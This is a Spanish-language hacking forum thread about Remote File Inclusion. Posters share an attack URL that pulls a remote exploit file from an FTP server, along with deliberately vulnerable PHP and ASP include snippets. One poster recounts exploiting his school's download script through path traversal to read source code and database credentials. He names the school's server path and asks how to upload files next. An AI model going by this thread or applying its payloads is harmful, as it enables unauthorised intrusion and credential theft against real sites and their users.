Manual de RFI (Remote File Inclusion)

Iniciado por Hyde, 3 Noviembre 2006, 04:53 AM

0 Miembros y 1 Visitante están viendo este tema.

izengabe

Ok,es buena la alternativa,no la he probado,pero supongo que funcionará.Pero aún así quiero saber la razón por la que a mí no me funciona de la forma original...Si no,no podré dormir... ;)
~~hAcK yoUr MiNd~~
  ~oKupA tU MeNte~

rakax

Si no me equivoco el exploit deberia de ir en otro formato k no sea .php por k se ejecutaria en tu servidor no en el de la victima,asi k seria correcto
www.pagina.com/ver.php?pagina=ftp://usuario:password@servidor.ftp.com/mixploit.gif
Citar
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

Azielito

y ahora un script en php vulnerable xD
<?php
$archivo 
$_GET['secc'];
include(
$archivo);
?>


Y en ASP
<%
Dim a
a = Request.QueryString("a")
if a <> "" Then
Server.Execute(a)
Else
Response.Redirect("index.htm")
End If
%>

supongo que los dos se entienden, con esto pueden poner en practica esta vulnerabilidad en http://localhost ;)

rakax

Buenas gracias por el dato pero....
me instale el php y todo y cuando lo corro en localhost lo k me sale es esto
Notice: Undefined index: secc in c:\program files\easyphp1-8\www\file.php on line 2

Warning: main(): Failed opening '' for inclusion (include_path='.;C:/Program Files/EasyPHP1-8\php\pear\') in c:\program files\easyphp1-8\www\file.php on line 3


Me prece k es k tengo k definir el archivo k se va a abrir con el inclusion pero no entiendo bien.
si es asi como lo hago? (no se php,desgraciadamente)
Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc

izengabe

Hyde,si no te importa,a ver si puedes echarme un cable con lo que he comentado antes:que no me funciona pasar parámetros por get cuando la extensión del archivo no es php... :rolleyes:
~~hAcK yoUr MiNd~~
  ~oKupA tU MeNte~

Hyde

No se si entendi bien tu pregunta. Te refieres que al intentar obtener algo no te da :huh:

Para pasar el get debe de estar en php, mandame un privado para pasarte algo que quiza te sirva pero no lo voy a colocar aqui porque es de otra web.

Intenta con demas vulnerabilidades, yo solo puse un ejemplo pero existen muchas maneras mas.

Salu2

Hyde




uniqdom

hola.. bueno el manual...
hace poco en la pagina de mi colegio me tope con una pagina  en la cual podia descargar archivos (guias, pruebas, etc...)

se me ocurrio que si modificaba los datos que se enviaban en la url podria obtener el codigo fuente de la pagina.

por ejemplo cambie de http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=fisica/guias&Archivo=cinematica.doc
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=DescargarArchivo.php
y eso fue lo que paso. obtube las fuentes. me pase un rato descargando otras paginas.php hasta que me tope con el user y pass de la base de datos... ahi me surgio otra pregunta, pero es parte de otro tema...



aun no se como poder subir archivos a el servidor.
intente:
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=http://www.google.com
y no me salio nada en pantalla. como estaba diseñado para descargar arhcivos pense que el archivo que me mandaba para bajar saldria el codigo html de google... pero no...


les dejo lo que venia en el codigo fuentede la pagina DescargarArchivo.php :

<?
$Archivo=$HTTP_GET_VARS["Archivo"];
$Carpeta=$HTTP_GET_VARS["Carpeta"];
$enlace = '/home/web/interactivo.maristas.cl/'.$Carpeta.'/'.$Archivo;
header ("Content-Disposition: attachment; filename=".$Archivo."\n\n");
header ("Content-Type: application/octet-stream");
header ("Content-Length: ".filesize($enlace));
readfile($enlace);
?>



asumo que el readfile($enlace); es con el que topo. porque supongo que intenta leer el archivo desde el servidor y no fuera.
alguien sabe que podria hacer??
igual voy a seguir buscando...